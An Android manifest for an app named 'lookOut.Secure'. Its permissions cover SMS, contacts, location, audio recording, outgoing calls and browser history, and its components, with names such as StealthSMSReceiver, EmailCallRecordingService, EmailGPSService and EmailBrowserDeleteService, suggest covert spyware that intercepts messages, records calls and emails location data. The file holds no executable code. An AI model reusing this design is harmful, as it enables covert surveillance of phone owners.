<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="lookOut.Secure">
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.WRITE_SMS"/>
    <uses-permission android:name="android.permission.READ_CONTACTS"/>
    <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.MODIFY_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
    <uses-permission android:name="android.permission.READ_CALENDAR"/>
    <uses-permission android:name="android.permission.WRITE_CALENDAR"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="com.android.browser.permission.READ_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="com.android.browser.permission.WRITE_HISTORY_BOOKMARKS"/>
    <uses-permission android:name="android.permission.RECORD_AUDIO"/>
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS"/>
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
    <uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_COARSE_UPDATES"/>
    <uses-permission android:name="android.permission.WAKE_LOCK"/>
    <application android:debuggable="true" android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:label="@string/activityName" android:name=".StealthRegisterationActivity"/>
        <receiver android:name=".StealthSMSReceiver">
            <intent-filter android:priority="999">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".EmailBootCompletedReceiver">
            <intent-filter>
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".StealthNetworkStatusReceiver">
            <intent-filter>
                <action android:name="android.net.conn.CONNECTIVITY_CHANGE"/>
            </intent-filter>
        </receiver>
        <receiver android:name=".StealthOutgoingCallReceiver">
            <intent-filter>
                <action android:name="android.intent.action.NEW_OUTGOING_CALL"/>
            </intent-filter>
        </receiver>
        <service android:enabled="true" android:name=".SecureSecondService"/>
        <service android:enabled="true" android:name=".EmailGPSService"/>
        <service android:enabled="true" android:name=".EmailGPSSMSService"/>
        <service android:enabled="true" android:name=".EmailSIMChangeNotifierService"/>
        <service android:enabled="true" android:name=".EmailGPSNotifierService"/>
        <service android:enabled="true" android:name=".EmailWipeSMSNotifierService"/>
        <service android:enabled="true" android:name=".EmailRecordingSMSNotifierService"/>
        <service android:enabled="true" android:name=".EmailBrowserDeleteService"/>
        <service android:enabled="true" android:name=".EmailDataChangeService"/>
        <service android:enabled="true" android:name=".SecureObserverService"/>
        <service android:enabled="true" android:name=".EmailFailureCheckerService"/>
        <service android:enabled="true" android:name=".SecureLocationService"/>
        <service android:enabled="true" android:name=".EmailSMSCmdProcessor"/>
        <service android:enabled="true" android:name=".SecureServiceLauncher"/>
        <service android:enabled="true" android:name=".SecureContAppointServiceLauncher"/>
        <service android:enabled="true" android:name=".SecureContAppointService"/>
        <service android:enabled="true" android:name=".LocationReportingService"/>
        <service android:enabled="true" android:name=".EmailCallRecordingService"/>
        <service android:enabled="true" android:name=".SecureIncomingCallRegService"/>
        <service android:enabled="true" android:name=".EmailRecordingBackupService"/>
    </application>
</manifest>
